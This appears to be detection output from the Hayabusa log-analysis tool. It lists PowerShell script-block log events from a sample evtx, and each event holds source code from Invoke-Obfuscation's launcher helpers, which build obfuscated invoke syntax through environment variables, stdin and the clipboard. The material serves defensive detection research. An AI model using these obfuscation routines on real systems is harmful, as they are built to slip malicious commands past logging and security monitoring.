$Part2.SubString($Part2.Length-$RedactedPrintLength) -ForegroundColor Cyan } Else { Write-Host $Part2 -ForegroundColor Cyan } $Counter++ } Start-Sleep 1 } # Make sure final command doesn't exceed cmd.exe's character limit. # Only apply this check to LaunchType values less than 13 since all the other launchers are not command line launchers. 
$CmdMaxLength = 8190 If(($CmdLineOutput.Length -gt $CmdMaxLength) -AND ($LaunchType -lt 13)) { Write-Host """" Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" Start-Sleep 1 } Return $CmdLineOutput } Function Out-RandomInvokeRandomEnvironmentVariableSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized syntax for invoking a process-level environment variable. Invoke-Obfuscation Function: Out-RandomInvokeRandomEnvironmentVariableSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomInvokeRandomEnvironmentVariableSyntax generates random invoke syntax and random process-level environment variable retrieval syntax for invoking command contents that are stored in a user-input process-level environment variable. This function is primarily used as a helper function for Out-PowerShellLauncher. .PARAMETER EnvVarName User input string or array of strings containing environment variable names to randomly select and apply invoke syntax. .EXAMPLE C:\PS> Out-RandomInvokeRandomEnvironmentVariableSyntax 'varname' .(\""In\"" +\""v\"" + \""o\""+ \""Ke-ExpRes\""+ \""sION\"" ) (^&( \""GC\"" +\""i\"" ) eNV:vaRNAMe ).\""V`ALue\"" .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options wher",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"e the PowerShell command is set in process-level environment variables for command line obfuscation benefits. 
This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String[]] $EnvVarName ) # Retrieve random variable from variable name array passed in as argument. $EnvVarName = Get-Random -Input $EnvVarName # Generate numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariables # Generate numerous ways to invoke command stored in environment variable. $GetRandomVariableSyntax = @() $GetRandomVariableSyntax += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'env:' + $EnvVarName + ').Value' $GetRandomVariableSyntax += ('(' + '[Environment]::GetEnvironmentVariable(' + ""'$EnvVarName'"" + ',' + ""'Process'"" + ')' + ')') # Select random option from above. $GetRandomVariableSyntax = Get-Random -Input $GetRandomVariableSyntax # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. 
$ExpressionToInvoke = $GetRandomVariableSyntax If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Run random invoke operation through the appropriate token obfuscators if $PowerShellStdIn is not simply a value of - from above random options. If($InvokeOption -ne '-') { # Run through all available token obfuscation functions in random order. $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) 'RandomWhitespace' 1 } # For obfuscated commands generated for $InvokeOption syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($InvokeOption.Contains(""$Char"")) { $InvokeOption = $InvokeOption.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($InvokeOption.Contains('""')) { $InvokeOption = $InvokeOption.Replace('""','\""') } Return $InvokeOption } Function Out-RandomPowerShellStdInInvokeSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized PowerShell syntax for invoking a command passed to powershell.exe via standard input. 
Invoke-Obfuscation Function: Out-RandomPowerShellStdInInvokeSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomPowerShellStdInInvokeSyntax generates random PowerShell syntax for invoking a command passed to powershell.exe via standard input. This technique is included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent process if passed to powershell.exe via standard input. .EXAMPLE C:\PS> Out-RandomPowerShellStdInInvokeSyntax ( ^& ('v'+( 'aR'+ 'Iabl' ) + 'E' ) ('exE'+'CUTiOnco' +'n'+ 'TeX' + 't' ) -Val).\""INvOKec`oMm`A`ND\"".\""invO`K`es`CRiPt\""(${I`N`puT} ) .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options where the PowerShell command is passed to powershell.exe via standard input for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Build out random PowerShell stdin syntax like: # | powershell - <-- default to this if $NoExit flag is defined because this will cause an error for the other options # | powershell IEX $Input # | powershell $ExecutionContext.InvokeCommand.InvokeScript($Input) # Also including numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. 
$ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = (Get-Random -Input $ExecContextVariables) $RandomInputVariable = (Get-Random -Input @('$Input','${Input}')) # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $RandomInputVariable If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # If $NoExit flag is defined in calling function then default to - stdin syntax. It will cause errors for other syntax options. If($NoExit) { $InvokeOption = '-' } # Set $PowerShellStdIn to value of $InvokeOption. $PowerShellStdIn = $InvokeOption # Random case of $PowerShellStdIn. 
$PowerShellStdIn = ([Char[]]$PowerShellStdIn.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Run random PowerShell Stdin operation through the appropriate token obfuscators. If($PowerShellStdIn -ne '-') { # Run through all available token obfuscation functions in random order. $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) 'RandomWhitespace' 1 } # For obfuscated commands generated for $PowerShellStdIn syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellStdIn.Contains(""$Char"")) { $PowerShellStdIn = $PowerShellStdIn.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($PowerShellStdIn.Contains('""')) { $PowerShellStdIn = $PowerShellStdIn.Replace('""','\""') } Return $PowerShellStdIn } Function Out-RandomClipboardInvokeSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized PowerShell syntax for invoking a command stored in the clipboard. Invoke-Obfuscation Function: Out-RandomClipboardInvokeSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomClipboardInvokeSyntax generates random PowerShell syntax for invoking a command stored in the clipboard. This technique is included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent/grandparent process if passed to powershell.exe via clipboard. 
.EXAMPLE C:\PS> Out-RandomClipboardInvokeSyntax . ( \""{0}{1}\"" -f( \""{1}{0}\""-f 'p','Add-Ty' ),'e' ) -AssemblyName ( \""{1}{0}{3}{2}\""-f ( \""{2}{0}{3}{1}\""-f'Wi','dows.Fo','em.','n'),(\""{1}{0}\""-f 'yst','S'),'s','rm' ) ; (.( \""{0}\"" -f'GV' ) (\""{2}{3}{1}{0}{4}\"" -f 'E','onCoNT','EXEC','UTi','XT')).\""Va`LuE\"".\""inVOK`Ec`OMmANd\"".\""inVOKe`SC`RIpT\""(( [sYsTEM.WInDOwS.foRMS.ClIPbOard]::( \""{1}{0}\""-f (\""{2}{1}{0}\"" -f'XT','tTE','e'),'g').Invoke( ) ) ) ;[System.Windows.Forms.Clipboard]::( \""{1}{0}\""-f'ar','Cle' ).Invoke( ) .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options where the PowerShell command is passed to powershell.exe via clipboard for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Set variables necessary for loading appropriate class/type to be able to interact with the clipboard. $ReflectionAssembly = Get-Random -Input @('System.Reflection.Assembly','Reflection.Assembly') $WindowsClipboard = Get-Random -Input @('Windows.Clipboard','System.Windows.Clipboard') $WindowsFormsClipboard = Get-Random -Input @('System.Windows.Forms.Clipboard','Windows.Forms.Clipboard') # Randomly select flag argument substring for Add-Type -AssemblyCore. $FullArgument = ""-AssemblyName"" # Take into account the shorted flag of -AN as well. $AssemblyNameFlags = @() $AssemblyNameFlags += '-AN' For($Index=2; $Index -le $FullArgument.Length; $Index++) { $AssemblyNameFlags += $FullArgument.SubString(0,$Index) } $AssemblyNameFlag = Get-Random -Input $AssemblyNameFlags # Characters we will use to generate random variable name. # For simplicity do NOT include single- or double-quotes in this array. 
$CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Generate random variable name. $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Generate paired random syntax options for: A) loading necessary class/assembly, B) retrieving contents from clipboard, and C) clearing/overwritting clipboard contents. $RandomClipSyntaxValue = Get-Random -Input @(1..3) Switch($RandomClipSyntaxValue) { 1 {",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"e the PowerShell command is set in process-level environment variables for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String[]] $EnvVarName ) # Retrieve random variable from variable name array passed in as argument. $EnvVarName = Get-Random -Input $EnvVarName # Generate numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. 
$ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariables # Generate numerous ways to invoke command stored in environment variable. $GetRandomVariableSyntax = @() $GetRandomVariableSyntax += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'env:' + $EnvVarName + ').Value' $GetRandomVariableSyntax += ('(' + '[Environment]::GetEnvironmentVariable(' + ""'$EnvVarName'"" + ',' + ""'Process'"" + ')' + ')') # Select random option from above. $GetRandomVariableSyntax = Get-Random -Input $GetRandomVariableSyntax # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $GetRandomVariableSyntax If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. 
$InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Run random invoke operation through the appropriate token obfuscators if $PowerShellStdIn is not simply a value of - from above random options. If($InvokeOption -ne '-') { # Run through all available token obfuscation functions in random order. $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) 'RandomWhitespace' 1 } # For obfuscated commands generated for $InvokeOption syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($InvokeOption.Contains(""$Char"")) { $InvokeOption = $InvokeOption.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($InvokeOption.Contains('""')) { $InvokeOption = $InvokeOption.Replace('""','\""') } Return $InvokeOption } Function Out-RandomPowerShellStdInInvokeSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized PowerShell syntax for invoking a command passed to powershell.exe via standard input. Invoke-Obfuscation Function: Out-RandomPowerShellStdInInvokeSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomPowerShellStdInInvokeSyntax generates random PowerShell syntax for invoking a command passed to powershell.exe via standard input. 
This technique is included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent process if passed to powershell.exe via standard input. .EXAMPLE C:\PS> Out-RandomPowerShellStdInInvokeSyntax ( ^& ('v'+( 'aR'+ 'Iabl' ) + 'E' ) ('exE'+'CUTiOnco' +'n'+ 'TeX' + 't' ) -Val).\""INvOKec`oMm`A`ND\"".\""invO`K`es`CRiPt\""(${I`N`puT} ) .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options where the PowerShell command is passed to powershell.exe via standard input for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Build out random PowerShell stdin syntax like: # | powershell - <-- default to this if $NoExit flag is defined because this will cause an error for the other options # | powershell IEX $Input # | powershell $ExecutionContext.InvokeCommand.InvokeScript($Input) # Also including numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = (Get-Random -Input $ExecContextVariables) $RandomInputVariable = (Get-Random -Input @('$Input','${Input}')) # Generate random invoke operation syntax. 
# 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $RandomInputVariable If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # If $NoExit flag is defined in calling function then default to - stdin syntax. It will cause errors for other syntax options. If($NoExit) { $InvokeOption = '-' } # Set $PowerShellStdIn to value of $InvokeOption. $PowerShellStdIn = $InvokeOption # Random case of $PowerShellStdIn. $PowerShellStdIn = ([Char[]]$PowerShellStdIn.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Run random PowerShell Stdin operation through the appropriate token obfuscators. If($PowerShellStdIn -ne '-') { # Run through all available token obfuscation functions in random order. $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) 'RandomWhitespace' 1 } # For obfuscated commands generated for $PowerShellStdIn syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. 
This will handle single-escaped and not-escaped characters. If($PowerShellStdIn.Contains(""$Char"")) { $PowerShellStdIn = $PowerShellStdIn.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($PowerShellStdIn.Contains('""')) { $PowerShellStdIn = $PowerShellStdIn.Replace('""','\""') } Return $PowerShellStdIn } Function Out-RandomClipboardInvokeSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized PowerShell syntax for invoking a command stored in the clipboard. Invoke-Obfuscation Function: Out-RandomClipboardInvokeSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomClipboardInvokeSyntax generates random PowerShell syntax for invoking a command stored in the clipboard. This technique is included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent/grandparent process if passed to powershell.exe via clipboard. .EXAMPLE C:\PS> Out-RandomClipboardInvokeSyntax . ( \""{0}{1}\"" -f( \""{1}{0}\""-f 'p','Add-Ty' ),'e' ) -AssemblyName ( \""{1}{0}{3}{2}\""-f ( \""{2}{0}{3}{1}\""-f'Wi','dows.Fo','em.','n'),(\""{1}{0}\""-f 'yst','S'),'s','rm' ) ; (.( \""{0}\"" -f'GV' ) (\""{2}{3}{1}{0}{4}\"" -f 'E','onCoNT','EXEC','UTi','XT')).\""Va`LuE\"".\""inVOK`Ec`OMmANd\"".\""inVOKe`SC`RIpT\""(( [sYsTEM.WInDOwS.foRMS.ClIPbOard]::( \""{1}{0}\""-f (\""{2}{1}{0}\"" -f'XT','tTE','e'),'g').Invoke( ) ) ) ;[System.Windows.Forms.Clipboard]::( \""{1}{0}\""-f'ar','Cle' ).Invoke( ) .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options where the PowerShell command is passed to powershell.exe via clipboard for command line obfuscation benefits. 
This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Set variables necessary for loading appropriate class/type to be able to interact with the clipboard. $ReflectionAssembly = Get-Random -Input @('System.Reflection.Assembly','Reflection.Assembly') $WindowsClipboard = Get-Random -Input @('Windows.Clipboard','System.Windows.Clipboard') $WindowsFormsClipboard = Get-Random -Input @('System.Windows.Forms.Clipboard','Windows.Forms.Clipboard') # Randomly select flag argument substring for Add-Type -AssemblyCore. $FullArgument = ""-AssemblyName"" # Take into account the shorted flag of -AN as well. $AssemblyNameFlags = @() $AssemblyNameFlags += '-AN' For($Index=2; $Index -le $FullArgument.Length; $Index++) { $AssemblyNameFlags += $FullArgument.SubString(0,$Index) } $AssemblyNameFlag = Get-Random -Input $AssemblyNameFlags # Characters we will use to generate random variable name. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Generate random variable name. $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Generate paired random syntax options for: A) loading necessary class/assembly, B) retrieving contents from clipboard, and C) clearing/overwritting clipboard contents. 
$RandomClipSyntaxValue = Get-Random -Input @(1..3) Switch($RandomClipSyntaxValue) { 1 {",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"$LoadClipboardClassOption = ""Add-Type $AssemblyNameFlag PresentationCore"" $GetClipboardContentsOption = ""([$WindowsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } 2 { $LoadClipboardClassOption = ""Add-Type $AssemblyNameFlag System.Windows.Forms"" $GetClipboardContentsOption = ""([$WindowsFormsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsFormsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } 3 { $LoadClipboardClassOption = (Get-Random -Input @('[Void]','$NULL=',""`$$RandomVarName="")) + ""[$ReflectionAssembly]::LoadWithPartialName('System.Windows.Forms')"" $GetClipboardContentsOption = ""([$WindowsFormsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsFormsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } default {Write-Error ""An invalid RandomClipSyntaxValue value ($RandomClipSyntaxValue) was passed to switch block for Out-RandomClipboardInvokeSyntax.""; Exit;} } # Generate syntax options for invoking clipboard contents, including numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. 
$ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariables # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $GetClipboardContentsOption If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Set final syntax for invoking clipboard contents. $PowerShellClip = $LoadClipboardClassOption + ' '*(Get-Random -Minimum 0 -Maximum 3) + ';' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $InvokeOption # Add syntax for clearing clipboard contents. 
$PowerShellClip = $PowerShellClip + ' '*(Get-Random -Minimum 0 -Maximum 3) + ';' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ClearClipboardOption # Run through all relevant token obfuscation functions except Type since it causes error for direct type casting relevant classes in a non-interactive PowerShell session. $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Member' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Member' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Command' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'CommandArgument' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Variable' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'String' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'RandomWhitespace' # For obfuscated commands generated for $PowerShellClip syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellClip.Contains(""$Char"")) { $PowerShellClip = $PowerShellClip.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. 
